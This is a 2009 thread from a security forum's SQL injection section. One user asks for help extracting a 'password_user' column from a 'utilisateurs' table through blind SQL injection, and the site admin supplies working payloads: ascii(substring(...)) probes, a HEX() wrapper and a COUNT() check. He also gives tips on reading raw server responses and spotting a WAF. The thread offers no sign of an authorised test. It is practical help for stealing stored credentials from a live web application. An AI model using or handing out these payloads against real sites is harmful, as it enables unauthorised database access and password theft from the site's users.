 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
how to read my blob column from mysql ( how can help me ? ) |
 |
 Posted: Wed Nov 25, 2009 12:20 am |
 |
|
| cr4ps |
| Advanced user |
 |
|
| Joined: May 06, 2009 |
| Posts: 91 |
|
|
|
 |
|
 |
|
Hey, I need your help , a column specified "password_user" Im not abel to select it as it exists in table "utilisateurs" and I got the following message "Internet Explorer can not display the page Web " I select another column named "login_user" and I was able to display it but the "password_user" can't be selected . . .
| Code: | | 8 and ascii(substring((SELECT login_user from utilisateurs where id_user=1 limit 0,1),1,1))>100 |
| Code: | | 8 and ascii(substring((SELECT password_user from utilisateurs where id_user=1 limit 0,1),1,1))>100 |
Thanks in advanced . . . |
|
Last edited by cr4ps on Mon Dec 07, 2009 11:51 am; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Wed Nov 25, 2009 10:32 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try using HEX():
| Code: |
8 and ascii(substring((SELECT HEX(password_user) from utilisateurs where id_user=1 limit 0,1),1,1))>100
|
And if you are using IE (which is bad idea anyway, because Firefox is better), then make sure, that "Show friendly HTTP error messages" in Advanced Options is turned off. In this case you will see actual server response, not that nonsense "The webpage cannot be found". Even better choice is to use Firefox + Live HTTP Headers Add-On and watch for server response details. |
|
|
|
|
|
|
|
|
| Posted: Wed Nov 25, 2009 11:22 am |
|
|
| cr4ps |
| Advanced user |
|
|
| Joined: May 06, 2009 |
| Posts: 91 |
|
|
|
|
|
|
|
| waraxe wrote: | Try using HEX():
| Code: |
8 and ascii(substring((SELECT HEX(password_user) from utilisateurs where id_user=1 limit 0,1),1,1))>100
|
And if you are using IE (which is bad idea anyway, because Firefox is better), then make sure, that "Show friendly HTTP error messages" in Advanced Options is turned off. In this case you will see actual server response, not that nonsense "The webpage cannot be found". Even better choice is to use Firefox + Live HTTP Headers Add-On and watch for server response details. |
Hi, thank you for the reply, but it didnt worked, i done like you said, but it don't work, could you help me little more ? |
|
|
|
|
| Posted: Wed Nov 25, 2009 11:32 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| What was server's response? If server responds with 4xx status code, then probably IPS/WAF kicks in. |
|
|
|
|
| Posted: Wed Nov 25, 2009 12:00 pm |
|
|
| cr4ps |
| Advanced user |
|
|
| Joined: May 06, 2009 |
| Posts: 91 |
|
|
|
|
|
|
|
| waraxe wrote: | | What was server's response? If server responds with 4xx status code, then probably IPS/WAF kicks in. |
server response is 200 |
|
|
|
|
| Posted: Wed Nov 25, 2009 12:08 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, try something more generic:
| Code: |
8 and (SELECT COUNT(password_user) from utilisateurs)>0
|
|
|
|
|
|
| Posted: Wed Nov 25, 2009 12:18 pm |
|
|
| cr4ps |
| Advanced user |
|
|
| Joined: May 06, 2009 |
| Posts: 91 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Dec 07, 2009 11:54 am |
|
|
| cr4ps |
| Advanced user |
|
|
| Joined: May 06, 2009 |
| Posts: 91 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 67
Members: 0
Total: 67
